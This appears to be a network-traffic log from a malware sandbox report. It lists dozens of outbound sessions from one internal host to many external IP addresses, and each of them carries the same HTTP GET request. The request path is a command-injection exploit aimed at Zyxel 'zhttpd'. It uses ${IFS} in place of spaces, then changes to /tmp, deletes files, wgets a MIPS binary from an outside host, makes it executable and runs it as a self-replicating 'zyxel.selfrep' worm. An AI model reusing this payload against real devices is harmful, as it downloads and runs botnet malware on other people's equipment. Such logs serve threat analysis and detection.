                                                Jan 12, 2024 18:16:38.818264961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8342192.168.2.2357152162.69.126.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818317890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8343192.168.2.234348653.204.96.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818403959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8344192.168.2.2338504156.233.74.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818454027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8345192.168.2.2339030104.171.4.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818520069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8346192.168.2.2348634208.239.80.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818558931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8347192.168.2.233295418.104.38.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818618059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8348192.168.2.2353906218.19.76.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818706989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8349192.168.2.2340734133.21.193.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818727016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8350192.168.2.23334789.246.205.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818790913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8351192.168.2.23454222.139.157.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818835974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8352192.168.2.233598617.7.175.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818909883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8353192.168.2.233672077.199.85.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.818959951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8354192.168.2.2348226165.14.203.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819021940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8355192.168.2.234167674.247.158.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819061995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8356192.168.2.234139057.184.141.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819087982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8357192.168.2.235723290.203.33.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819179058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8358192.168.2.233461665.80.116.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819247007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8359192.168.2.2338212102.88.156.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819324970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8360192.168.2.2360076140.122.29.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819366932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8361192.168.2.235651263.229.0.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819426060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8362192.168.2.2339316186.243.36.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819470882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8363192.168.2.235929094.170.229.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819509029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8364192.168.2.2356668220.171.109.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819575071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8365192.168.2.2332938194.246.194.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819644928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8366192.168.2.2357018135.213.192.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819677114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8367192.168.2.2342334130.15.117.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819739103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8368192.168.2.2351410161.55.205.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819776058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8369192.168.2.2347282185.207.218.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819840908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8370192.168.2.2336990204.51.82.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819896936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8371192.168.2.2332964185.199.195.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819947004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8372192.168.2.2348450219.125.87.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.819993019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8373192.168.2.234851477.160.103.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820060968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8374192.168.2.2353326123.93.5.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820099115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8375192.168.2.2357652132.195.122.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820168018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8376192.168.2.235984671.246.252.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820223093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8377192.168.2.2350538159.166.133.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820283890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8378192.168.2.2336450109.76.1.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820342064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8379192.168.2.235775067.247.188.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820400000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8380192.168.2.233911064.246.13.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820457935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8381192.168.2.2342194102.44.217.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820496082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8382192.168.2.2358648157.59.150.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820542097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8383192.168.2.2346666143.56.139.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820576906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8384192.168.2.2344994191.200.131.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820617914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8385192.168.2.23372468.185.221.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820672035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8386192.168.2.234956258.65.136.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820756912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8387192.168.2.2348860162.104.245.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820797920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8388192.168.2.2357544107.216.215.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820871115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8389192.168.2.233721095.118.253.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820914030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8390192.168.2.2338536117.232.67.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.820972919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8391192.168.2.2341122213.93.184.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821002960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8392192.168.2.236035680.177.61.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821074009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8393192.168.2.2346756165.218.251.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821136951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8394192.168.2.2338968178.215.9.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821180105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8395192.168.2.234120888.14.110.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821222067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8396192.168.2.2342074137.107.37.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821257114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8397192.168.2.2349328104.84.172.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821330070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8398192.168.2.2351026103.189.60.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821393967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8399192.168.2.2345902164.190.90.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821424007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8400192.168.2.2358650153.14.180.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821495056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8401192.168.2.2334778193.137.116.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821552992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8402192.168.2.2360280176.254.138.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821603060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8403192.168.2.2355182179.196.11.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:38.821659088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8404192.168.2.2358462178.108.175.104443
                                                TimestampBytes transferredDirectionData
